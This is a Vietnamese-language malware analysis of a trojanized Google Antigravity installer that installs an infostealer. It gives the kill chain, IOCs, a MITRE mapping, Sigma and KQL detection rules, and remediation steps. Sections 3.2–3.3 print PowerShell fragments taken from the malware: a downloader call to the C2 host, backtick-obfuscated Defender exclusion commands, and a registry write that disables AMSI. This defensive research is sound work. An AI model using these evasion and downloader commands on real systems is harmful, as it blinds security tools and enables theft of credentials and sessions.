# Trojanized Google Antigravity: Khi Installer Thật Là Vũ Khí Tốt Nhất Của Kẻ Tấn Công

## Tóm tắt chiến dịch

Ngày 21/04/2026, Malwarebytes ghi nhận một chiến dịch phân phối infostealer ngụy trang dưới dạng installer của Google Antigravity — công cụ AI coding ra mắt tháng 11/2025 và nhanh chóng trở thành một trong những developer tool được tìm kiếm nhiều nhất. Kẻ tấn công không cần xây dựng một installer giả mạo từ đầu: họ lấy nguyên bản installer gốc của Google, nhúng thêm một PowerShell script bổ sung vào bảng Custom Action của MSI, rồi phân phối lại qua domain typosquat `google-antigravity[.]com`.

Điều khiến chiến dịch này nguy hiểm là người dùng nhận được đúng thứ họ muốn: ứng dụng Antigravity cài đặt hoàn toàn bình thường, shortcut xuất hiện trên desktop, mọi thứ hoạt động đúng. Phần độc hại diễn ra âm thầm ở background, qua ba giai đoạn có cấu trúc: disable Defender → exfiltrate machine profile → cài persistent backdoor dưới dạng scheduled task ngụy trang thành Microsoft Edge Update.

Session cookie bị đánh cắp cho phép bypass hoàn toàn MFA. Khoảng cách từ lúc chạy installer đến khi tài khoản bị chiếm có thể chỉ vài phút.

**Hành động ưu tiên:** Kiểm tra ngay trong firewall/EDR logs mọi kết nối đến `opus-dsn[.]com` và `captr.b-cdn[.]net`, tìm scheduled task `MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}`, và kiểm tra file `MicrosoftEdgeUpdate.png` trong `C:\ProgramData\`.

* * *

## 1\. Bối cảnh: Xu hướng AI Tool Lure đang tăng tốc

### Từ crack software đến AI tool — vector tấn công tiến hóa

Chiến thuật phân phối malware qua phần mềm giả mạo không mới. Điều đã thay đổi là **lure** — mồi nhử. Trong hai năm qua, mỗi lần một AI tool lớn ra mắt, domain typosquat và installer giả mạo xuất hiện theo sau trong vài tuần. Trend này được ghi nhận rõ ràng:

*   **Tháng 1–3/2026:** Ít nhất 20 chiến dịch malware riêng biệt nhắm vào AI và vibe coding tools (theo Pillar Security)
    
*   **Tháng 2/2026:** Fake Claude Code pages phân phối Amatera Stealer qua Google Ads
    
*   **Tháng 3/2026:** OpenClaw bị abuse qua ClickFix và fake skill repository
    
*   **Tháng 4/2026:** Fake Slack installer (slacks\[.\]pro) cài HVNC backdoor; fake Google Antigravity cài .NET stealer
    

Lý do AI tool trở thành lure lý tưởng: người dùng mới, chưa nhớ URL chính xác, áp lực phải thử ngay khi tool vừa ra mắt, và tâm lý "developer thì không sợ malware." Theo Pillar Security, người dùng AI và vibe coding tool có xu hướng sử dụng macOS nhiều hơn và thường có credential có giá trị cao hơn — SSH key, cloud token, crypto wallet.

### Google Antigravity — Mục tiêu được chọn kỹ

Google Antigravity ra mắt tháng 11/2025 và nhanh chóng trở thành một trong những developer tool được tìm kiếm nhiều nhất trên web. URL thực của sản phẩm là `antigravity.google` — không phải URL mà người dùng mới sẽ nhớ ngay. Đây là điều kiện lý tưởng cho typosquatting.

* * *

## 2\. Kill Chain / Attack Flow

```plaintext
[Nạn nhân] → Tìm kiếm "Google Antigravity download"
     │
     ▼
[Typosquat Domain]
google-antigravity[.]com  (giả mạo antigravity.google)
     │  Giao diện website giống hệt trang Google thật
     ▼
[Download] → Antigravity_v1.22.2.0.exe  (138 MB)
     │  Installer thật + 1 dòng độc hại trong MSI Custom Action
     ▼
[MSI Execution]
     │  Custom Action "wefasgsdfg" chạy PowerShell cradle
     │  Antigravity cài đặt bình thường vào C:\Program Files (x86)\
     ▼
[Stage 1 — Downloader Cradle]  scr[random].ps1
     │  HTTPS GET → https://opus-dsn[.]com/login/
     │  Gửi machine profile, chờ quyết định của operator
     ▼
[Operator Decision: Target this machine?]
     │  Nếu KHÔNG: Dừng. Nạn nhân không biết gì.
     │  Nếu CÓ: Server trả về payload script
     ▼
[Stage 2 — Defender Disable + Machine Profiling]
     │  Add-MpPreference: Loại trừ %ProgramData%, %APPDATA%
     │  Add-MpPreference: Loại trừ .exe, .msi, .dll, .png
     │  Add-MpPreference: Loại trừ rundll32, regasm, powershell, chrome, msedge
     │  Disable AMSI: HKLM\...\AmsiEnable=0
     │  Collect: Windows version, AD domain, AV product
     │  Exfil profile đến C2 (trong utm_content parameter)
     ▼
[Stage 3 — Persistent Payload Staging]
     │  Download: captr.b-cdn[.]net/secret.png
     │  Lưu: C:\ProgramData\MicrosoftEdgeUpdate.png (AES-256-CBC)
     │  Tạo Scheduled Task: MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}
     │  Payload: conhost.exe --headless → PowerShell → decrypt PNG → load .NET assembly
     ▼
[Stage 4 — One-Shot In-Memory Stealer]
     │  Download: captr.b-cdn[.]net/GGn.xml (AES encrypted)
     │  Decrypt → load .NET assembly vào memory
     │  Thu thập: Logins, Cookies, Autofills, FTP, Crypto wallets
     │  Exfiltrate → C2
     ▼
[Account Takeover trong vài phút]
```

* * *

## 3\. Phân tích kỹ thuật chi tiết

### 3.1 Trojanized Installer: Kỹ thuật "One Extra Line"

Đây là điểm kỹ thuật đáng chú ý nhất của chiến dịch. Kẻ tấn công không tạo installer giả. Họ lấy nguyên bản installer 138 MB của Google Antigravity — bao gồm toàn bộ ứng dụng Electron, Vulkan graphics libraries, và updater — rồi thêm **duy nhất một dòng** vào MSI Custom Action table.

![Trojanized installer setup wizard](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/2_setup.png align="center")

*Giao diện Setup Wizard của installer trojanized — hoàn toàn giống bản gốc.*

MSI Custom Action table của installer hợp lệ chứa 11 entry, tất cả bắt đầu bằng prefix `AI_` (do installer tool tự sinh). Entry thứ 12, tên là `wefasgsdfg` (keyboard mash — tên kẻ tấn công gõ ngẫu nhiên khi tool hỏi tên), là entry duy nhất chạy script độc hại.

![MSI Custom Action table với entry wefasgsdfg](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/4_setup.png align="center")

*Bảng Custom Action của MSI: 11 entry chuẩn bắt đầu bằng* `AI_`*, và một entry tên* `wefasgsdfg` *của kẻ tấn công.*

```plaintext
Tên entry độc hại: wefasgsdfg
Hành động:         Chạy PowerShell script từ %TEMP%
Thời điểm:         Trong quá trình install, song song với các bước hợp lệ
Hậu quả:           Antigravity cài đúng; payload chạy song song mà người dùng không thấy
```

Kết quả: Antigravity được cài vào `C:\Program Files (x86)\Google LLC\Antigravity\`, shortcut xuất hiện trên desktop, ứng dụng mở và hoạt động bình thường. Người dùng không có lý do gì để nghi ngờ.

### 3.2 Downloader Cradle: Tính linh hoạt tối đa cho operator

Entry `wefasgsdfg` drop hai file PowerShell vào `%TEMP%`:

| File | Nội dung |
| --- | --- |
| `scr[4-digit-random].ps1` | Script của kẻ tấn công — **downloader cradle** |
| `pss[4-digit-random].ps1` | Advanced Installer utility hợp lệ — vô hại |

**Downloader cradle** (`scr*.ps1`) có nhiệm vụ duy nhất: mở HTTPS connection đến `https://opus-dsn[.]com/login/`, tải code từ server, và thực thi. Để tránh bị phát hiện:

```powershell
# Giả mạo Referer header của Microsoft
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$req = [System.Net.WebRequest]::Create("https://opus-dsn[.]com/login/")
$req.Referer = "https://www.microsoft.com"
$req.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()  # Dùng proxy hệ thống
# ...
```

Giá trị của kiến trúc này đối với attacker: **payload nằm trên server, không trong installer**. Điều đó có nghĩa là:

*   Kẻ tấn công có thể thay payload bất cứ lúc nào mà không cần phát tán lại installer
    
*   Có thể target chọn lọc từng nạn nhân — chỉ gửi payload cho máy "đáng"
    
*   Nếu domain bị block, chỉ cần đổi C2; installer ngoài kia vẫn nguyên Nếu server không trả về gì (ví dụ, nạn nhân không đủ hấp dẫn, hoặc đang trong sandbox), mọi thứ dừng lại. Không có file nào được drop thêm, không có scheduled task nào, không có persistence. Tool bảo mật tự động sẽ bỏ qua.
    

![Network traffic của downloader cradle](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/5_phone_call.png align="center")

*Traffic từ downloader cradle: DNS query → TCP 443 → HTTPS GET /login/. Một kết nối duy nhất, rồi PowerShell thoát.*

### 3.3 Stage 2: Vô hiệu hóa Defender — Ba lớp evasion

Khi server quyết định "target này đáng," payload script trả về thực hiện ba nhiệm vụ nối tiếp nhau.

**Bước 1 — Mở rộng exclusion ban đầu:**

```powershell
# Tên cmdlet bị split bằng backtick để bypass string-matching detection
Add`-MpPreference -ExclusionPath $env:ProgramData
Add`-MpPreference -ExclusionPath $env:APPDATA
Add`-MpPreference -ExclusionExtension ".exe", ".msi", ".dll"
Add`-MpPreference -ExclusionProcess "powershell.exe", "regasm.exe", "rundll32.exe", "msedge.exe", "chrome.exe"
```

**Bước 2 — Thu thập machine profile và beacon:**

```plaintext
Profile gửi về C2:
- Windows version
- Active Directory domain (nếu domain-joined)
- Installed AV product
- [Encrypted với RSA public key nhúng trong script]
- [Gửi qua utm_content parameter để disguise thành marketing traffic]
```

**Bước 3 — Vô hiệu hóa AMSI (Antimalware Scan Interface):**

```powershell
# Thêm exclusion cho .png và conhost.exe (cần cho stage tiếp theo)
Add`-MpPreference -ExclusionExtension ".png"
Add`-MpPreference -ExclusionProcess "conhost.exe"
 
# Disable AMSI hoàn toàn
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Script\Settings" `
                 -Name "AmsiEnable" -Value 0
```

AMSI (Antimalware Scan Interface) là layer cho phép Windows Defender đọc nội dung script trước khi thực thi — ngay cả script chạy in-memory. Sau khi AMSI bị tắt, mọi PowerShell script và .NET assembly load sau đó đều không bị Defender scan.


### 3.4 Stage 3: Persistence — "Ảnh PNG" không phải ảnh PNG

```plaintext
URL download:  https://captr.b-cdn[.]net/secret.png
Lưu tại:       C:\ProgramData\MicrosoftEdgeUpdate.png
Thực chất:     AES-256-CBC ciphertext wrapping một .NET assembly
               Key/IV: PBKDF2 với 10.000 iterations từ hardcoded passphrase
```

Scheduled task được tạo với tên:

```plaintext
MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}
```

Tên thật của Microsoft Edge update task là `MicrosoftEdgeUpdateTaskMachineCore` — kẻ tấn công thêm một GUID-like string vào để làm khác đi đủ để không trùng, nhưng vẫn đủ gần để không ai để ý khi scroll qua Task Scheduler.

Task action:

```plaintext
conhost.exe --headless → PowerShell ẩn → Decrypt MicrosoftEdgeUpdate.png → 
Reflective load .NET assembly vào memory
```

**Tại sao reflective loading?** Assembly không bao giờ được ghi ra disk dưới dạng EXE hay DLL. Nó decrypt trong memory và load thẳng vào process của PowerShell. Chỉ có file `.png` AES-encrypted và scheduled task tồn tại trên disk — và cả hai đều được Defender exclude. Forensic artifact tối thiểu.

### 3.5 Stage 4: Stealer In-Memory — Một lần chạy, không để lại dấu vết

Song song với việc đăng ký persistence, script download một payload thứ hai:

```plaintext
URL:    https://captr.b-cdn[.]net/GGn.xml
Format: AES-encrypted, key khác với secret.png
Mode:   Reflective load vào running PowerShell process
Vòng đời: Chạy một lần, không persist sau reboot
```

.NET stealer assembly được phân tích qua class và method names (không bị obfuscate trong binary):

```plaintext
Classes: BrowserStealer, CookieStealer, WalletStealer, 
         DiscordStealer, TelegramStealer, SteamStealer, FtpStealer
Methods: GetLogins(), GetCookies(), GetAutofills(), 
         GetFtpConnections(), ClipboardHijack(), KeylogInit()
```

![Các function của .NET stealer assembly](https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/6_functions.png align="center")

*Class/method names của .NET stealer — viết bằng plain English mô tả đúng mục đích.*

**Mục tiêu thu thập:**

| Loại dữ liệu | Source |
| --- | --- |
| Saved passwords | Chrome, Edge, Brave, Firefox và mọi Chromium-based browser |
| Session cookies | Gmail, Microsoft 365, banking, GitHub, Discord, Telegram, Steam |
| Autofill / Credit card | Browser autofill database |
| Crypto wallet | Extension data (MetaMask, Exodus...) + desktop wallet files |
| FTP credentials | FTP clients |
| Keystrokes | Keystroke logger (Windows API import) |
| Clipboard | Clipboard hijacker — đặc biệt nguy hiểm với crypto address |

**Hidden Desktop (HVNC) capability:**

Bên cạnh stealer, binary còn import Windows API phục vụ HVNC (Hidden Virtual Network Computing): tạo một Windows desktop ẩn thứ hai mà attacker có thể điều khiển độc lập với session hiện tại của người dùng. Trong scenario đầy đủ, attacker có thể đăng nhập vào tài khoản, phê duyệt giao dịch, hoặc gửi tin nhắn — trong khi màn hình thật của nạn nhân không thay đổi.

* * *

## 4\. Tại sao Session Cookie nguy hiểm hơn Password

Đây là điểm cần nhấn mạnh với cả technical và non-technical audience.

Password thông thường bị bảo vệ bởi nhiều lớp: MFA, login anomaly detection (IP lạ, thiết bị mới), và hashing phía server. Session cookie thì không có lớp bảo vệ nào trong số đó — nó **là** bằng chứng đã xác thực rồi.


```plaintext
Kịch bản:
1. Nạn nhân đang đăng nhập Gmail (session cookie còn hiệu lực)
2. Stealer copy cookie ra → gửi về C2
3. Attacker import cookie vào browser của họ
4. Gmail thấy cookie hợp lệ → cho vào inbox không hỏi gì
5. Không có MFA prompt, không có "new device" alert (vì đã bypass bằng cookie)
```

Với Gmail hay Microsoft 365 bị chiếm, attacker có thể reset gần như mọi tài khoản liên kết khác trong vài phút.

* * *

## 5\. Indicators of Compromise (IOC)

> ⚠️ Tất cả domain/IP đã được defang. Re-fang trước khi thêm vào blocklist.

### File Artifacts

```plaintext
# Trojanized installer
SHA256: 61aca585687ec21a182342a40de3eaa12d3fc0d92577456cae0df37c3ed28e99
Tên:    Antigravity_v1.22.2.0.exe
Size:   138 MB
```

### Network Indicators

```plaintext
# C2 và payload hosting
opus-dsn[.]com            (downloader cradle C2)
captr.b-cdn[.]net         (BunnyCDN — payload hosting)
89[.]124[.]96[.]27        (IP của opus-dsn[.]com)
 
# Phân phối
google-antigravity[.]com  (typosquat domain)
```

### Host-Based Indicators

```plaintext
# File path persistence
C:\ProgramData\MicrosoftEdgeUpdate.png       (AES-encrypted .NET assembly)
 
# Scheduled task
Tên: MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}
Action: conhost.exe --headless [powershell]
 
# Registry (AMSI disabled)
HKLM\Software\Policies\Microsoft\Windows Script\Settings\AmsiEnable = 0
 
# PowerShell temp files (tên thay đổi mỗi lần)
%TEMP%\scr[4-random-digits].ps1
%TEMP%\pss[4-random-digits].ps1
 
# Cài đặt hợp lệ (dùng để confirm trojanized install)
C:\Program Files (x86)\Google LLC\Antigravity\   (thư mục hợp lệ)
```

### Defender Exclusions bị thêm (dấu hiệu compromise)

```powershell
# Kiểm tra bằng lệnh này trên endpoint nghi ngờ:
Get-MpPreference | Select-Object ExclusionPath, ExclusionExtension, ExclusionProcess
 
# Kết quả đáng ngờ nếu thấy:
ExclusionPath:      C:\ProgramData, C:\Users\[user]\AppData\Roaming
ExclusionExtension: .exe, .msi, .dll, .png
ExclusionProcess:   powershell.exe, rundll32.exe, regasm.exe, conhost.exe
```

* * *

## 6\. MITRE ATT&CK Mapping

| Phase | Technique ID | Tên kỹ thuật | Mô tả |
| --- | --- | --- | --- |
| Resource Development | T1583.001 | Acquire Infrastructure: Domains | Đăng ký domain typosquat |
| Initial Access | T1204.002 | User Execution: Malicious File | Người dùng tự chạy trojanized installer |
| Execution | T1059.001 | PowerShell | Downloader cradle + payload scripts |
| Execution | T1059.003 | Windows Command Shell | conhost.exe --headless |
| Persistence | T1053.005 | Scheduled Task | MicrosoftEdgeUpdateTaskMachineCore{...} |
| Defense Evasion | T1036.004 | Masquerade Task or Service | Fake Edge update task name |
| Defense Evasion | T1562.001 | Disable/Modify Security Tools | Add-MpPreference exclusions |
| Defense Evasion | T1562.001 | Disable AMSI | AmsiEnable=0 in registry |
| Defense Evasion | T1027 | Obfuscated Files | Backtick split cmdlet names, AES payload |
| Defense Evasion | T1027.002 | Software Packing | .NET assembly AES-256-CBC encrypted |
| Defense Evasion | T1620 | Reflective Code Loading | Load .NET assembly in-memory |
| Defense Evasion | T1036.005 | Match Legitimate Name | Fake .png file, legit-looking path |
| C2 | T1071.001 | Web Protocols (HTTP/HTTPS) | C2 qua HTTPS |
| C2 | T1568 | Dynamic Resolution | Operator-controlled payload delivery |
| C2 | T1102.002 | CDN as dead drop | BunnyCDN hosting payload |
| Credential Access | T1555.003 | Credentials from Web Browsers | Browser password/cookie theft |
| Credential Access | T1539 | Steal Web Session Cookie | Session cookie exfiltration |
| Collection | T1056.001 | Keylogging | Keystroke logging API |
| Collection | T1115 | Clipboard Data | Clipboard hijacking |
| Collection | T1005 | Local System Data | Crypto wallet, FTP data |

* * *

## 7\. Detection Logic

### Sigma Rule — AMSI Disabled via Registry

```yaml
title: AMSI Disabled via Registry Policy Key
id: b1c2d3e4-f5a6-7890-bcde-f12345678901
status: experimental
description: Detects disabling of AMSI via registry write — common in infostealer
  and post-exploitation frameworks
references:
  - https://www.malwarebytes.com/blog/threat-intel/2026/04/fake-google-antigravity-downloads-are-stealing-accounts-in-minutes
author: Security Research Team
date: 2026/04/27
tags:
  - attack.defense_evasion
  - attack.t1562.001
logsource:
  category: registry_set
  product: windows
detection:
  selection:
    TargetObject|contains: '\Windows Script\Settings\AmsiEnable'
    Details: 'DWORD (0x00000000)'
  condition: selection
falsepositives:
  - Intentional administrative policy (rare, requires verification)
level: high
```

### Sigma Rule — Suspicious MpPreference Exclusion (Backtick Obfuscation)

```yaml
title: Suspicious Add-MpPreference with Backtick Obfuscation
id: c2d3e4f5-a6b7-8901-cdef-234567890123
status: experimental
description: Detects PowerShell Add-MpPreference with backtick-split cmdlet name
  used to bypass string-matching AV detections
tags:
  - attack.defense_evasion
  - attack.t1562.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'Add`-MpPreference'
      - 'ExclusionPath'
      - 'ExclusionProcess'
  condition: selection
level: high
```

### Sigma Rule — Fake Edge Update Scheduled Task

```yaml
title: Suspicious Scheduled Task Mimicking Microsoft Edge Updater
id: d3e4f5a6-b7c8-9012-def0-345678901234
status: experimental
description: Detects creation of scheduled task with name similar to legitimate
  Microsoft Edge update task but with appended GUID-like string
tags:
  - attack.persistence
  - attack.t1053.005
  - attack.t1036.004
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\schtasks.exe'
    CommandLine|contains|all:
      - 'MicrosoftEdgeUpdateTaskMachineCore'
      - '{'
  condition: selection
falsepositives:
  - Legitimate Edge update task does NOT have GUID suffix
level: high
```

### KQL (Microsoft Sentinel) — Downloader Cradle C2 Contact

```kql
// Phát hiện PowerShell kết nối đến C2 đã biết của chiến dịch này
let KnownC2 = dynamic(["opus-dsn.com", "captr.b-cdn.net"]);
DeviceNetworkEvents
| where RemoteUrl has_any (KnownC2)
    or RemoteIP == "89.124.96.27"
| where InitiatingProcessFileName =~ "powershell.exe"
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP, 
          InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
```

### KQL — Suspicious PNG File in ProgramData

```kql
// Phát hiện file .png trong ProgramData được tạo bởi PowerShell
// (dấu hiệu encrypted payload staging)
DeviceFileEvents
| where FolderPath startswith @"C:\ProgramData\"
| where FileName endswith ".png"
| where InitiatingProcessFileName =~ "powershell.exe"
| project TimeGenerated, DeviceName, FileName, FolderPath, 
          InitiatingProcessFileName, InitiatingProcessCommandLine
```

### KQL — AMSI Registry Key Modification

```kql
DeviceRegistryEvents
| where RegistryKey has "Windows Script\\Settings"
| where RegistryValueName == "AmsiEnable"
| where RegistryValueData == "0"
| project TimeGenerated, DeviceName, RegistryKey, 
          RegistryValueName, RegistryValueData, InitiatingProcessFileName
```

* * *

## 8\. Nhận định chuyên gia

### Tại sao chiến dịch này tinh vi hơn những gì nhìn thấy

Nhóm phân tích chúng tôi nhận thấy chiến dịch này thể hiện mức độ operational discipline rõ ràng ở hai điểm:

**Thứ nhất, operator-controlled targeting.** Downloader cradle không tự động deploy payload — nó check-in với C2 và chờ quyết định. Điều này có nghĩa là kẻ tấn công có thể skip sandbox và VM, chỉ attack những máy "thật" có profile đáng giá. Nạn nhân bị skip không bao giờ biết mình đã bị check.

**Thứ hai, defense evasion có tầng lớp.** Từ backtick obfuscation trong PowerShell để bypass string detection, đến AES-encrypted PNG trong thư mục ngụy trang Microsoft, đến AMSI disable trước khi load in-memory assembly — mỗi bước loại bỏ một lớp detection. Kết quả là payload cuối cùng chạy trong môi trường mà Defender đã bị mù hoàn toàn.

### Pattern lớn hơn: AI Tool Lure đang trở thành primary vector

Sự hội tụ giữa AI hype và supply chain vulnerability đã tạo ra một perfect storm cho attacker. Credential bị đánh cắp bởi infostealer malware đã được liên kết với các breach lớn tại Snowflake, Ticketmaster, và Santander Bank.

Pattern rõ ràng đang hình thành: **mỗi AI tool lớn ra mắt = typosquat domain + trojanized installer xuất hiện trong vài tuần.** Fake Claude Code, fake OpenClaw, fake Slack, và bây giờ fake Google Antigravity — đây không phải sự kiện đơn lẻ mà là một playbook đang được tái sử dụng hệ thống.

### Mức độ liên quan tại Việt Nam

Developer tool adoption tại Việt Nam đang tăng nhanh, đặc biệt trong cộng đồng dev và startup. Áp lực thử AI tool mới ngay khi ra mắt, kết hợp với thói quen download từ kết quả Google search đầu tiên mà không verify URL, tạo ra risk surface cao. Với doanh nghiệp có team developer truy cập corporate SSO từ máy cá nhân, một ca nhiễm duy nhất có thể dẫn đến breach toàn bộ hệ thống nội bộ — đặc biệt khi machine profile bao gồm Active Directory domain name, cho phép kẻ tấn công biết chính xác đây là máy của tổ chức nào.

* * *

## 9\. Khuyến nghị

### Immediate (0–24 giờ)

```plaintext
1. Hunt trên EDR/SIEM:
   - Scheduled task: MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}
   - File: C:\ProgramData\MicrosoftEdgeUpdate.png
   - Registry: HKLM\Software\Policies\Microsoft\Windows Script\Settings\AmsiEnable = 0
   - Hash: 61aca585687ec21a182342a40de3eaa12d3fc0d92577456cae0df37c3ed28e99
 
2. Block tại firewall/proxy:
   - opus-dsn[.]com (mọi port)
   - 89[.]124[.]96[.]27
   - google-antigravity[.]com
 
3. Kiểm tra Defender exclusion bất thường trên endpoint:
   Get-MpPreference | Select ExclusionPath, ExclusionExtension, ExclusionProcess
```

### Short-term (1–7 ngày)

```plaintext
4. Nếu có evidence of compromise:
   - Từ thiết bị sạch: Sign out mọi session Gmail, M365, banking, GitHub, Discord, Telegram, Steam
   - Đổi password bắt đầu từ email (email bị chiếm = attacker reset mọi thứ)
   - Rotate mọi API key, SSH key trên máy bị nhiễm
   - Move crypto wallet funds từ thiết bị sạch ngay lập tức
   - Wipe và reinstall Windows
 
5. Nếu máy bị nhiễm là work laptop:
   - Thông báo IT/Security team ngay — machine profile đã bị collect kèm AD domain
 
6. Triển khai detection rules trong section 7
 
7. Block hoặc alert mọi kết nối PowerShell → External HTTPS trong giờ làm việc
```

### Long-term

```plaintext
8. Software download policy: Chỉ download từ URL chính thức đã được bookmark
   (không download qua Google search result mà không verify domain)
 
9. Application control (AppLocker/WDAC):
   Block EXE chưa ký digital signature từ Microsoft/Google/Vendor
 
10. Monitor Defender exclusion thay đổi (event ID 5007):
    Bất kỳ thay đổi Add-MpPreference nào ngoài GPO phải trigger alert
 
11. Script Block Logging + PowerShell Constrained Language Mode
    Làm downloader cradle khó thực thi hơn đáng kể
 
12. Internal awareness cho developer team:
    Bookmark URL chính thức, không Google "tool X download"
```

* * *

## 10\. Tài liệu tham khảo

1.  Stefan Dasic, Malwarebytes — *Fake Google Antigravity downloads are stealing accounts in minutes*, 21/04/2026  
    https://www.malwarebytes.com/blog/threat-intel/2026/04/fake-google-antigravity-downloads-are-stealing-accounts-in-minutes
    
2.  Malwarebytes — *A fake Slack download is giving attackers a hidden desktop on your machine*, 16/04/2026  
    https://www.malwarebytes.com/blog/threat-intel/2026/04/a-fake-slack-download-is-giving-attackers-a-hidden-desktop-on-your-machine
    
3.  The Hacker News — *ClickFix Campaigns Spread MacSync via Fake AI Tool Installers*, tháng 3/2026  
    https://thehackernews.com/2026/03/clickfix-campaigns-spread-macsync-macos.html
    
4.  Intel 471 — *OpenClaw: A viral AI assistant and a magnet for infostealer malware*, tháng 3/2026  
    https://www.intel471.com/blog/openclaw-a-viral-ai-assistant-and-a-magnet-for-infostealer-malware-and-clickfix-trickery
    
5.  Microsoft Learn — *How AMSI helps you defend against malware*  
    https://learn.microsoft.com/en-us/windows/win32/amsi/
    
6.  MITRE ATT&CK — T1620: Reflective Code Loading  
    https://attack.mitre.org/techniques/T1620/
    
7.  MITRE ATT&CK — T1562.001: Disable or Modify Tools  
    https://attack.mitre.org/techniques/T1562/001/
